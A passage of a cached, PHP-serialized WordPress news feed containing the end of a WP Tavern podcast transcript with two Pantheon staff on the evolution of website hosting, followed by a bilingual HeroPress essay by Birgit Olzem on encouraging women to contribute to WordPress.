screens, dials, and levers. Then we&#8217;ll, we&#8217;ll truly have the car from across the entire century. So is that where we&#8217;re at now then? If we chart our history we spoke about HTML files, and then PHP coming along and then flattening things. Is that this history lesson ends, or is there more to say?</p>\n\n\n\n<p>[00:33:42] Steve Persch: The way I think about it, a phrase I often like to repeat to myself that came from a customer of ours, is that Pantheon needs to aim for state of the art, not bleeding edge. We see the state of the art for many web teams right now is one where you use a totally stable content management system like WordPress or Dupal for the content management systems.</p>\n\n\n\n<p>And because so many front end developers simply expect to be working in JavaScript centric tools for teams in that, in that pool. Yes, you should have the front end then controlled through JavaScript centric tools. But do so with server side rendering because the content editors expect to press publish and then immediately see the change. And that works well with server side rendering.</p>\n\n\n\n<p>So that&#8217;s, that&#8217;s a mode that we support in our front end sites product, the front end sites product does also support that static mode. Which is beneficial for a subset of teams out there. Like Pantheon&#8217;s own documentation site has been a totally static site for nearly a decade. I think as long as we&#8217;ve had a standalone docs site, it&#8217;s been static. And that works for that team where everything is all just in a Git repo. An edit to code can happen at the same time as an edit to the content markdown files. That works for that mode.</p>\n\n\n\n<p>But we see that, you know, the state of the art for some web teams, as that mix of a contact management system, and a server side rendered Node.js framework. I should also say, because we&#8217;re on a WordPress centric podcast here, if you are totally comfortable with WordPress, as is, you don&#8217;t need to jump on a new React framework or a new JavaScript framework, just because there are a lot of people on Twitter saying it&#8217;s great. If you can do your job without taking on the extra complexity, stick with what works.</p>\n\n\n\n<p>[00:35:28] Nathan Wrigley: Yeah, it&#8217;s a really good point. You mentioned there, now, I can&#8217;t remember the exact phrasing that you used, but you made a differentiation between bleeding edge and something else. Is that an approach that you take? Do you keep a watchful eye on what is happening at the extremes of technology.</p>\n\n\n\n<p>[00:35:44] Steve Persch: Oh absolutely, yes.</p>\n\n\n\n<p>[00:35:46] Nathan Wrigley: PhD thesis which are describing what the future might look like. But holding back just a little bit until it&#8217;s embedded and we figured out what all of this stuff is. That&#8217;s the approach?</p>\n\n\n\n<p>[00:35:56] Steve Persch: Absolutely. So it is not a coincidence that Pantheon as a company started a decade after Drupal came into being. It was starting as a Drupal centric company, and then adding WordPress a few years later. That&#8217;s not a coincidence. There needed to be a decade or so of figuring out, how do we make websites like this before Pantheon or any company like Pantheon could do what we did. Which is put guardrails around what our founders considered to be a best practice mode of developing and maintaining and improving a lamp stack site.</p>\n\n\n\n<p>Trying to impose those guardrails the same year that a system like WordPress or Drupal comes out, that wouldn&#8217;t make sense. Similarly, we didn&#8217;t really enter this front end framework ecosystem until about a decade in. I think almost exactly a decade after React, was released publicly is when we entered this space fully.</p>\n\n\n\n<p>We&#8217;ve been keeping an eye on it for a very long time. I&#8217;ve been at Pantheon for seven years and that was one of my very first questions, my first week, like, when are we going to get into the Node.js space? And the answer then was not yet. And then for a while, it was soon. And then the answer was like, okay, now.</p>\n\n\n\n<p>And now we can see, okay, the edge and one of the reasons I like to use that term bleeding edge is because that&#8217;s also the term for where the bleeding edge is now. The edge, as a synonym for the content delivery network. So companies like Cloudflare or Fastly that cache your website all over the world, have been adding more and more advanced capabilities beyond the simple caching that makes the website faster. That is very clearly where the bleeding edge or the cutting edge is now. We have a CDN baked in. We have ways of exploring that. However, put it all on the edge is not an acceptable answer yet for the broad plurality of professional web teams.</p>\n\n\n\n<p>[00:37:50] Nathan Wrigley: Why is that? What&#8217;s the thing which makes that untenable?</p>\n\n\n\n<p>[00:37:53] Steve Persch: The very short answer is because your database is still in one place. Even though the cloud abstracts so much like. There is a MySQL database or an abstraction thereof that lives physically in one place. Because we run on Google Cloud, that place for most sites on Pantheon is in Council Bluffs, Iowa.</p>\n\n\n\n<p>For a WordPress site that you know, may be making in some cases hundreds of MySQL queries to generate an HTML page, hopefully fewer than, than a few hundred, but in many cases, hundreds of queries. It&#8217;s best if the PHP process that&#8217;s making those queries is right next to, physically right next to that database.</p>\n\n\n\n<p>There are new companies popping up spreading your database all over the world at the edge. Okay, that sounds cool, but before, before we take some of the biggest websites in the world and say, oh yeah, your database will be everywhere. We need to see how that plays out with those who, who want to jump on the edge earlier. Because for the sites we serve and cater to they need to be planning in very long terms.</p>\n\n\n\n<p>We&#8217;re highly adopted in the edu space, and I, I&#8217;ve put together timelines on yardsticks to represent like the multi hundred year history of these universities that we&#8217;re working with. And asking like, on a multi a hundred year scale or a scale of decades, it doesn&#8217;t matter that much if you switch to the new thing, whatever the new thing is, this semester or next semester, or this year or next year? Let&#8217;s wait till we know that that next thing is solid before we jump on it.</p>\n\n\n\n<p>[00:39:23] Brian Perry: As the JavaScript guy, I got to say I want it now. But, aside from that, one thing that&#8217;s interesting from the front end perspective as well, thinking about running things on the edge. One of the challenges there is that right now, all of the different solutions for edge functions tend to use different variations of JavaScript runtime. So there&#8217;s really no consistency there. And I think that&#8217;s another thing that&#8217;s going to have to change before that gets real wide adoption, when there can be one consistent JavaScript runtime that is typically used for that solution.</p>\n\n\n\n<p>[00:39:54] Nathan Wrigley: You mentioned Steve, but Brian maybe can answer this as well, I don&#8217;t know. You mentioned that there are people who are endeavoring to break up the database and put it in all sorts of different parts of the world and what have you. So that&#8217;s one innovation which people are trying to achieve. I&#8217;m just curious about what the next 10 years will look like. What kind of fun, interesting projects have you guys been keeping your eye on, which the listeners may be interested in? Just to give some insight into what hosting a WordPress website might look like Well, in 2025, 2026, whatever it may be.</p>\n\n\n\n<p>[00:40:29] Brian Perry: My kind of, it&#8217;s partially my hope, but also where I&#8217;d like to think that things are going. With all of the constant changes in the JavaScript framework landscape, I think that more and more of the things that people like about that sort of developer experience is going to find its way just more generally into the platform and into browser standards.</p>\n\n\n\n<p>Again, like looking back in the rear view, jQuery is a good example of that, in that jQuery brought so many wonderful niceties for how you can interact with the DOM. And then over time, most of the things that jQuery can do are just in JavaScript now. So they&#8217;re part of the platform.</p>\n\n\n\n<p>So my hope is that the things that people like about React and Vue and et cetera, start to find their way into the general platform. Web components are one potential technology that might help there. A component based approach that can be used regardless of the framework.</p>\n\n\n\n<p>My hope is that in the next 10 years, a lot of the things that people turn to React or Vue or different frameworks for, are just a part of the platform, rather than having to find your cool JavaScript framework that was released three months ago,</p>\n\n\n\n<p>[00:41:47] Nathan Wrigley: Yeah. Nice. Thank you, Brian. Steve, anything to add to that?</p>\n\n\n\n<p>[00:41:51] Steve Persch: I&#8217;ll give a quick tech answer, then a longer, uh, philosophical sort of answer. So the quick tech answer is web assembly. I&#8217;ll be quick because I can&#8217;t speak to many of the details of web assembly, maybe Brian can? I see it as a layer that can abstract away many of the differences between the different computer languages that we&#8217;re all writing in. PHP, JavaScript, TypeScript, Rust. If web assembly is a common target that can be used to leverage software. You write in these different modes. Run it in the same place, be it at the edge, or I saw a demo recently that I think involved web assembly getting WordPress to fully run in your browser, like the WordPress running in web assembly in your browser. Okay, that, that looks cool.</p>\n\n\n\n<p>The thing I&#8217;m, I&#8217;m probably most excited about right now for where the overall web zeitgeist is going is, is that the web development ecosystem seems to be coming back to what WordPress has been saying for a long time, of decisions, not options as that philosophical pillar for the WordPress community.</p>\n\n\n\n<p>I find it very reassuring that these front end framework projects that for a decade or so, provided so many options and put so many decisions on the plate of individual web teams and said like, you figure out whether or not you want Redux or this other thing to pair with your React project, and good luck sorting out the hundreds or thousands of NPM dependencies that get installed.</p>\n\n\n\n<p>The frameworks that seem to be, that just are ascendant, right now, are the ones that are consolidating a lot of those options. Turning them into decisions that are made at the framework level, be it Next.js or Astro or Remix. The leaders of those projects seem to understand that there&#8217;s a desire in the community for, for those framework maintainers as experts to make a good quality decision that works for the broad majority of users of those frameworks. Be it Next or Astro or anything else. The users of Next.js are comfortable with an increasing number of decisions being first made in a centralized framework. WordPress has been doing that again for 20 years. Again, it&#8217;s fashionable.</p>\n\n\n\n<p>[00:44:11] Nathan Wrigley: Yeah, history I think in many respects is fairly cyclical. What goes around does seem to come around. Yeah, good observation. I&#8217;m curious at this point, we&#8217;ve reached the 50 minute mark, and I want to wrap it up. I know you&#8217;ve got things to do with your day. But is there anything that you had wished that we had talked about that we failed to?</p>\n\n\n\n<p>[00:44:31] Steve Persch: Brian, do you want to touch on Decoupled Kit?</p>\n\n\n\n<p>[00:44:34] Brian Perry: Yeah, I&#8217;d love to talk about that a little bit. The Decoupled Kit project is essentially what we&#8217;re thinking of as a kit, is essentially a backend starter project and a front end starter kit that are intended to work together as close to out of the box with as little configuration as possible. To try to simplify the process of setting up the headless or decoupled architecture sites.</p>\n\n\n\n<p>And also provide some common examples of types of integrations and common problems that need to be solved there. And the thing that I think is most interesting about some of what we&#8217;re doing there. Again, thinking about this being an open source project sponsored by Pantheon, is we&#8217;re trying to solve some of these problems in cases where it makes sense in a framework agnostic way.</p>\n\n\n\n<p>So, obviously starter projects for both Drupal and WordPress. And then within that we have a starter kit, we have multiple starter kits that are based on React. So we have a starter kit for Gatsby and WordPress, and a starter kit for Next.js and WordPress. So we&#8217;re trying to find cases where there are things that we can abstract out, which are just essentially like general utilities for sourcing data from WordPress. And not things that are really strictly tied to any one framework.</p>\n\n\n\n<p>So that if there is, you know, another framework in the future that we need to support, or gains popularity, it&#8217;s easy to make adjustments there and adapt to that. And I think in the headless CMS community, both in the Drupal world and the WordPress world. I think there&#8217;s a lot of opportunity for tools that are a little bit more framework agnostic, that can still serve popular projects like Next.js. But hopefully are things that the community can use as the JavaScript world evolves.</p>\n\n\n\n<p>I&#8217;ll just also throw out there that, would love to, as we continue to build things, any feedback on the project. The main repo is decoupled dash kit dash js, under the Pantheon Systems GitHub. Would love to hear what people run into, any features that they&#8217;d love to see us support in the future. Any feedback is welcome.</p>\n\n\n\n<p>[00:46:45] Nathan Wrigley: I will make sure to link to all of the bits and pieces that we&#8217;ve talked about in the show notes. So if you are listening to this and you want to follow up on what the guys have been mentioning, then head over to wptavern.com, search for the episode, and all of the links will be in the show notes. Just before I let you go and get on with your busy days. If somebody wants to reach out to you personally and connect, what are the best ways, what are the methods that you are willing to share publicly? Let&#8217;s go with Brian first.</p>\n\n\n\n<p>[00:47:16] Brian Perry: Sure. Yeah, I&#8217;m in a number of CMS and Pantheon community Slacks, usually as Brian Perry. That, that&#8217;s one decent way to get at me. And then also I am still on Twitter. That is my main connection to the web development social media world, currently. Bri Comedy, b r i comedy on Twitter.</p>\n\n\n\n<p>[00:47:38] Nathan Wrigley: Brian, thank you very much. And Steve.</p>\n\n\n\n<p>[00:47:40] Steve Persch: I am spending less time on Twitter these days, although I&#8217;m still there as at stevector. And LinkedIn is the social network that I&#8217;m opening most often these days, and I&#8217;m easy to find just by searching for Steve Persch.</p>\n\n\n\n<p>[00:47:55] Nathan Wrigley: Thank you very much. Brian Perry and Steve Persch really appreciate you coming onto the podcast today. Thank you very much indeed.</p>\n\n\n\n<p>[00:48:02] Steve Persch: Thank you, Nathan.</p>\n\n\n\n<p>[00:48:03] Brian Perry: Thank you.</p>\n</div>\n\n\n\n<p>On the podcast today we have <a href=\"https://pantheon.io/team/steve-persch\">Steve Persch</a> and <a href=\"https://pantheon.io/team/brian-perry\">Brian Perry</a>. They’re both employed at <a href=\"https://pantheon.io/\">Pantheon</a>, an enterprise website operations platform, and they’re here to talk about the evolution of website hosting.</p>\n\n\n\n<p>Back when the internet started, hosting was a fairly straightforward enterprise. You created HTML files and uploaded them to a server. That was it. An HTML file was a page.</p>\n\n\n\n<p>Server-side technologies such as PHP came along and the picture became a little more complex. Web pages needed to be constructed on-the-fly. Databases were thrown into the mix and the complexity increased.</p>\n\n\n\n<p>Add in the different languages that you could write your code in, and the server configurations. The CMS that you choose also plays into this mix.</p>\n\n\n\n<p>Now we’ve got CDNs, headless, React, Gatsby, Node.js and much more. Is it even possible for the non-technical to have any understanding of where their website is?</p>\n\n\n\n<p>Steve and Brian talk about how they got into the hosting space and what’s changed over the years. We address what Pantheon is doing with WordPress and Drupal.</p>\n\n\n\n<p>We discuss how headless can be difficult for content teams, given that there’s a disconnect with hitting the publish button, and that content going live on the site.</p>\n\n\n\n<p>What’s certain is that there’s no end in sight in terms of the rate of innovation in the website hosting space. What’s popular today might not be several years from now, and so it’s a timely discussion of what Steve and Brain see as the best bets for the future.</p>\n\n\n\n<h2 class=\"wp-block-heading\">Useful links.</h2>\n\n\n\n<p><a href=\"https://pantheon.io/blog/decoupled-kit\">Brian&#8217;s blog post about Decoupled Kit</a></p>\n\n\n\n<p><a href=\"https://www.youtube.com/watch?v=dF39cXW3IqY\">Steve&#8217;s video &#8220;Decoupled Architectures: What Computer Assembles the website&#8221;</a></p>\n\n\n\n<p><a href=\"https://www.contentful.com/\">Contentful</a></p>\n\n\n\n<p><a href=\"https://www.sanity.io/\">Sanity</a></p>\n\n\n\n<p><a href=\"https://gatsbyconf.com/\">GatsbyConf</a></p>\n\n\n\n<p><a href=\"https://docs.pantheon.io/overview/support\">Pantheon&#8217;s documentation site</a></p>\n\n\n\n<p><a href=\"https://www.cloudflare.com/\">Cloudflare</a></p>\n\n\n\n<p><a href=\"https://www.fastly.com/\">Fastly</a></p>\n\n\n\n<p><a href=\"https://webassembly.org/\">WebAssembly</a></p>\n\n\n\n<p><a href=\"https://nextjs.org/\">Next.js</a></p>\n\n\n\n<p><a href=\"https://astro.build/\">Astro</a></p>\n\n\n\n<p><a href=\"https://www.gatsbyjs.com/\">Gatsby</a></p>\n\n\n\n<p><a href=\"https://twitter.com/bricomedy\">Brian&#8217;s Twitter</a></p>\n\n\n\n<p><a href=\"https://twitter.com/stevector/\">Steve&#8217;s Twitter</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 05 Apr 2023 14:00:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Nathan Wrigley\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:32;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:192:\"HeroPress: Empowering Women within the WordPress Community: Embracing Contributions and Overcoming Fear – Empowerment von Frauen in der WordPress-Community: Mitmachen und Ängste überwinden\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://heropress.com/?post_type=heropress-essays&p=5438\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:256:\"https://heropress.com/essays/empowering-women-within-the-wordpress-community-embracing-contributions-and-overcoming-fear/#utm_source=rss&utm_medium=rss&utm_campaign=empowering-women-within-the-wordpress-community-embracing-contributions-and-overcoming-fear\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:15453:\"<img width=\"1024\" height=\"512\" src=\"https://heropress.com/wp-content/uploads/2023/04/040323-min.jpg\" class=\"attachment-large size-large wp-post-image\" alt=\"Pull Quote: Women, your talents, ideas, and passion are needed, and together we can continue to shape the future of WordPress.\" /><p><a href=\"https://heropress.com/feed/#deutsch\">Dieses Essay ist auch auf Deutsch verfügbar.</a></p>\n\n\n\n\nHere is Birgit reading her own story aloud.\n\n\n\n\n\n\n<p>The world of technology and open-source projects can often feel intimidating, especially for women, who may experience feelings of inadequacy or fear of rejection. In my own journey within the WordPress community, I have faced challenges and insecurities while navigating an environment where my work and accomplishments sometimes go unrecognized. However, I have also discovered the incredible impact that women&#8217;s contributions can have on the community and the importance of overcoming fear to make a meaningful difference. Today, I will share my experience and mission to empower women to contribute to the WordPress project, regardless of the obstacles they might face.</p>\n\n\n\n<h3 id=\"h-my-experience-in-the-wordpress-community\">My Experience in the WordPress Community:</h3>\n\n\n\n<p>Even though I’ve used WordPress from its first release, I began my journey in the WordPress community back in 2010 by visiting my first WordCamp in Berlin, Germany. This WordCamp was my leap into deep waters, I couldn’t imagine. There I made valuable contacts which led me joining one of the biggest WordPress agencies in Germany. After joining the Inpsyde Agency, whose founder also initiated the German-speaking WordPress community and ran the community forums, I was soon made responsible for overseeing the translations and compiling the software packages for the WordPress releases in German.&nbsp;</p>\n\n\n\n<p>Since then, I have contributed in various ways, from organizing meetups and writing support documentation to translating the software and providing training materials. Like many others, I was not always vocal about my contributions, and due to the lack of visible logs, I could not easily measure the impact of my work. This lack of recognition sometimes left me feeling discouraged and questioning my value within the community.</p>\n\n\n\n<p>Nonetheless, I persisted – with some mental health related sabbaticals – in contributing to the project, driven by my passion for WordPress and a desire to help others. Over time, I began to recognize the importance of the work I was doing, regardless of whether it was acknowledged by others. I saw firsthand how my efforts, along with those of countless other women in the community, helped to shape the WordPress ecosystem, making it more inclusive, accessible, and user-friendly.</p>\n\n\n\n<h3 id=\"h-the-importance-of-embracing-contributions-and-overcoming-fear\">The Importance of Embracing Contributions and Overcoming Fear:</h3>\n\n\n\n<p>Despite the challenges we may face, it is crucial for women to embrace their contributions and overcome their fears in the WordPress community. By stepping up and sharing our skills, talents, and insights, we can help shape the future of the project and make a lasting impact. There are several reasons why this is essential:</p>\n\n\n\n<ol>\n<li>Diversity in perspectives: Women bring unique perspectives and experiences to the table, which can lead to innovative solutions and a more well-rounded community. By contributing, we help ensure that the WordPress project remains diverse and inclusive.</li>\n\n\n\n<li>Empowerment and personal growth: Taking on challenges and pushing ourselves beyond our comfort zones can be an incredibly empowering experience. Contributing to the WordPress community not only allows us to grow professionally, but also boosts our self-confidence and sense of accomplishment.</li>\n\n\n\n<li>Inspiring others: When we step up and contribute despite our fears, we become role models for other women who may be hesitant to get involved. By sharing our stories and experiences, we can inspire and encourage others to join the community and make their own impact.</li>\n\n\n\n<li>Building a supportive network: By actively participating in the WordPress community, we can form connections and relationships with like-minded individuals who can offer support, mentorship, and encouragement. This network can be invaluable in overcoming challenges and fostering a sense of belonging within the community.</li>\n</ol>\n\n\n\n<h3 id=\"h-my-mission-to-empower-women-in-the-wordpress-community\">My Mission to Empower Women in the WordPress Community</h3>\n\n\n\n<p>As someone who has experienced the challenges and rewards of contributing to the WordPress project, I am dedicated to empowering other women to do the same. My mission is to create a supportive environment where women feel encouraged to share their talents, ideas, and expertise, regardless of any fears or obstacles they may face.</p>\n\n\n\n<p>To achieve this goal, I am committed to:</p>\n\n\n\n<ul>\n<li>Raising awareness about the importance of women&#8217;s contributions in the WordPress community</li>\n\n\n\n<li>Actively recognizing and celebrating the achievements of women who have made a significant impact within the project</li>\n\n\n\n<li>Encouraging mentorship programs that support and guide women in their journey as contributors</li>\n\n\n\n<li>Sharing my own experiences and lessons learned to inspire and empower others</li>\n\n\n\n<li>Fostering a sense of camaraderie and support among women in the community, promoting collaboration and understanding</li>\n</ul>\n\n\n\n<p>Fear can be a powerful deterrent that prevents us from realizing our full potential and making meaningful contributions to the projects and communities we care about. However, it is crucial for women to recognize the value of their skills and insights and to overcome their fears in order to make a lasting impact within the WordPress community.</p>\n\n\n\n<p>By embracing our contributions, seeking support, and empowering one another, we can help create a more inclusive, diverse, and vibrant WordPress ecosystem that benefits everyone. So, to all the women who have thought about contributing to the WordPress project but have held back due to fear or uncertainty, I encourage you to take that first step. Your talents, ideas, and passion are needed, and together we can continue to shape the future of WordPress.</p>\n\n\n\n<p>Disclaimer: While the content of this essay primarily addresses women, I wholeheartedly acknowledge and embrace the diversity of gender and sexual orientation, including those who identify as female, non-binary, or belong to underrepresented groups.</p>\n\n\n\n<div class=\"kb-row-layout-wrap kb-row-layout-id_ade563-ae alignnone kt-row-has-bg wp-block-kadence-rowlayout\"><div class=\"kt-row-column-wrap kt-has-1-columns kt-row-layout-equal kt-tab-layout-inherit kt-mobile-layout-row kt-row-valign-top\">\n\n<div class=\"wp-block-kadence-column kadence-column_d879cf-9a\"><div class=\"kt-inside-inner-col\">\n<h2 id=\"work-environment\" class=\"kt-adv-heading_1e8c32-97 wp-block-kadence-advancedheading\">Birgit&#8217;s Work Environment</h2>\n\n\n\n<p>We asked Birgit for a view into her development life and this is what she sent! </p>\n\n\n	<div class=\"hotspots-image-container\">\n		<img width=\"2560\" height=\"1920\" src=\"https://heropress.com/wp-content/uploads/2023/03/birgit-olzems-desk-scaled-1.jpeg\" alt=\"Birgit Olzem\" class=\"hotspots-image skip-lazy\" />\n	</div>\n\n\n\n\n<p class=\"kt-adv-heading_b61d45-c4 wp-block-kadence-advancedheading has-theme-palette-9-background-color has-background\">HeroPress would like to thank <a href=\"https://wpdrawattention.com/\">Draw Attention</a> for their donation of the plugin to make this interactive image!</p>\n</div></div>\n\n</div></div>\n\n\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\" />\n\n\n\n<h1 id=\"deutsch\" class=\"kt-adv-heading_ca583d-16 wp-block-kadence-advancedheading\">Empowerment von Frauen in der WordPress-Community: Mitmachen und Ängste überwinden</h1>\n\n\n\n<p>Die Welt der Technologie und der Open-Source-Projekte kann oft einschüchternd wirken, insbesondere für Frauen, die sich unzulänglich fühlen oder Angst vor Ablehnung haben. Auf meinem eigenen Weg in der WordPress-Community war ich mit Herausforderungen und Unsicherheiten konfrontiert, in denen meine Arbeit und meine Leistungen manchmal nicht anerkannt wurden. Aber ich habe auch entdeckt, welch unglaublichen Einfluss die Beiträge von Frauen auf die Community haben können und wie wichtig es ist, Ängste zu überwinden, um etwas zu bewegen. Heute werde ich meine Erfahrungen und meine Mission teilen, Frauen zu befähigen, einen Beitrag zum WordPress-Projekt zu leisten, unabhängig von den Hindernissen, auf die sie stoßen könnten.</p>\n\n\n\n<h3>Meine Erfahrungen mit der WordPress-Community:</h3>\n\n\n\n<p>Obwohl ich WordPress seit seiner ersten Veröffentlichung benutze, begann meine Reise in die WordPress-Community im Jahr 2010 mit der Teilnahme an meinem ersten WordCamp in Berlin, Deutschland. Dieses WordCamp war mein Sprung in tiefere Gewässer, als ich es mir je hätte träumen lassen. Dort habe ich wertvolle Kontakte geknüpft, die mich zu einer der größten WordPress-Agenturen in Deutschland geführt haben. Bei der Agentur Inpsyde, deren Gründer auch die deutschsprachige WordPress-Community initiierte und die Community-Foren leitete, war ich bald für die Betreuung der Übersetzungen und die Erstellung der Softwarepakete für die deutschsprachigen WordPress-Versionen zuständig.&nbsp;</p>\n\n\n\n<p>Seitdem habe ich mich auf verschiedene Weise eingebracht, von der Organisation von Meetups und dem Schreiben von Support-Dokumentation bis hin zur Übersetzung von Software und der Bereitstellung von Schulungsmaterialien. Wie viele andere habe ich meine Beiträge nicht immer laut ausgesprochen, und da es oft keine sichtbaren Aufzeichnungen gab, war es für mich nicht leicht, die Auswirkungen meiner Arbeit zu messen. Dieser Mangel an Anerkennung führte manchmal dazu, dass ich mich entmutigt fühlte und meinen Wert innerhalb der Community infrage stellte.</p>\n\n\n\n<p>Nichtsdestotrotz arbeitete ich &#8211; mit einigen gesundheitsbedingten Unterbrechungen &#8211; weiter an dem Projekt, angetrieben von meiner Leidenschaft für WordPress und dem Wunsch, anderen zu helfen. Mit der Zeit wurde mir klar, wie wichtig die Arbeit war, die ich leistete, unabhängig davon, ob sie von anderen anerkannt wurde. Ich konnte aus erster Hand sehen, wie meine Bemühungen und die unzähliger anderer Frauen in der Community dazu beitrugen, das WordPress-Ökosystem inklusiver, zugänglicher und benutzerfreundlicher zu machen.</p>\n\n\n\n<h3>Die Bedeutung von Beteiligung und die Überwindung von Ängsten:</h3>\n\n\n\n<p>Trotz der Herausforderungen, mit denen wir konfrontiert sind, ist es für Frauen von entscheidender Bedeutung, ihren Beitrag zu leisten und ihre Ängste in der WordPress-Community zu überwinden. Indem wir unsere Fähigkeiten, Talente und Einsichten mit anderen teilen, können wir die Zukunft des Projekts mitgestalten und einen nachhaltigen Einfluss ausüben. Dies ist aus mehreren Gründen wichtig:</p>\n\n\n\n<ol>\n<li>Vielfalt der Perspektiven: Frauen bringen einzigartige Perspektiven und Erfahrungen ein, die zu innovativen Lösungen und einer vielfältigeren Gemeinschaft führen können. Durch unseren Beitrag tragen wir dazu bei, dass das WordPress-Projekt vielfältig und inklusiv bleibt.</li>\n\n\n\n<li>Empowerment und persönliches Wachstum: Sich Herausforderungen zu stellen und die eigene Komfortzone zu verlassen, kann eine unglaublich befähigende Erfahrung sein. Die Beteiligung an der WordPress-Community lässt uns nicht nur beruflich wachsen, sondern stärkt auch unser Selbstvertrauen und das Gefühl, etwas erreicht zu haben.</li>\n\n\n\n<li>Andere inspirieren: Wenn wir trotz unserer Ängste einen Beitrag leisten, werden wir zu Vorbildern für andere Frauen, die vielleicht noch zögern, sich zu engagieren. Indem wir unsere Geschichten und Erfahrungen teilen, können wir andere inspirieren und ermutigen, sich der Gemeinschaft anzuschließen und selbst etwas zu bewegen.</li>\n\n\n\n<li>Aufbau eines unterstützenden Netzwerks: Durch die aktive Teilnahme an der WordPress-Community können wir Verbindungen und Beziehungen zu Gleichgesinnten aufbauen, die uns unterstützen, beraten und ermutigen können. Dieses Netzwerk kann von unschätzbarem Wert sein, wenn es darum geht, Herausforderungen zu meistern und das Zusammengehörigkeitsgefühl innerhalb der Community zu stärken.</li>\n</ol>\n\n\n\n<h3>Meine Mission: Frauen in der WordPress-Community stärken</h3>\n\n\n\n<p>Als jemand, der die Herausforderungen und Vorteile der Teilnahme am WordPress-Projekt selbst erfahren hat, möchte ich andere Frauen ermutigen, dasselbe zu tun. Meine Mission ist es, ein unterstützendes Umfeld zu schaffen, in dem Frauen sich ermutigt fühlen, ihre Talente, Ideen und ihr Fachwissen mit anderen zu teilen, unabhängig von Ängsten oder Hindernissen, denen sie begegnen könnten.</p>\n\n\n\n<p>Um dieses Ziel zu erreichen, verpflichte ich mich, die folgenden Maßnahmen zu ergreifen:</p>\n\n\n\n<ul>\n<li>Sensibilisierung für die Bedeutung der Beiträge von Frauen in der WordPress-Community</li>\n\n\n\n<li>Aktive Anerkennung und Würdigung der Leistungen von Frauen, die einen wichtigen Beitrag zum Projekt geleistet haben.</li>\n\n\n\n<li>Förderung von Mentoring-Programmen, die Frauen auf ihrem Weg als Mitwirkende unterstützen und begleiten</li>\n\n\n\n<li>Eigene Erfahrungen und Erkenntnisse weitergeben, um andere zu inspirieren und zu stärken</li>\n\n\n\n<li>Förderung von Teamgeist und Unterstützung unter den Frauen in der Gemeinschaft, Förderung von Zusammenarbeit und Verständnis.</li>\n</ul>\n\n\n\n<p>Angst kann ein mächtiges Hindernis sein, das uns davon abhält, unser volles Potenzial auszuschöpfen und einen sinnvollen Beitrag zu den Projekten und Gemeinschaften zu leisten, die uns am Herzen liegen. Es ist jedoch von entscheidender Bedeutung, dass Frauen den Wert ihrer Fähigkeiten und Einsichten erkennen und ihre Ängste überwinden, um eine nachhaltige Wirkung in der WordPress-Gemeinschaft zu erzielen.</p>\n\n\n\n<p>Indem wir unsere Inputs annehmen, Unterstützung suchen und uns gegenseitig stärken, können wir dazu beitragen, ein inklusiveres, vielfältigeres und lebendigeres WordPress-Ökosystem zu schaffen, von dem alle profitieren. Daher möchte ich alle Frauen, die darüber nachgedacht haben, einen Beitrag zum WordPress-Projekt zu leisten, sich aber aus Angst oder Unsicherheit zurückgehalten haben, ermutigen, den ersten Schritt zu tun. Ihre Talente, Ideen und Leidenschaft werden gebraucht und gemeinsam können wir die Zukunft von WordPress gestalten.</p>\n\n\n\n<p>Disclaimer: Obwohl sich der Inhalt dieses Essays in erster Linie an Frauen richtet, erkenne ich die Vielfalt des Geschlechts und der sexuellen Orientierung von ganzem Herzen an und begrüße sie, einschließlich derer, die sich als weiblich oder nicht-binär identifizieren oder anderen unterrepräsentierten Gruppen angehören.</p>\n<p>The post <a rel=\"nofollow\" href=\"https://heropress.com/essays/empowering-women-within-the-wordpress-community-embracing-contributions-and-overcoming-fear/\">Empowering Women within the WordPress Community: Embracing Contributions and Overcoming Fear &#8211; Empowerment von Frauen in der WordPress-Community: Mitmachen und Ängste überwinden</a> appeared first on <a rel=\"nofollow\" href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 05 Apr 2023 12:34:48 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:12:\"Birgit Olzem\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:33;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	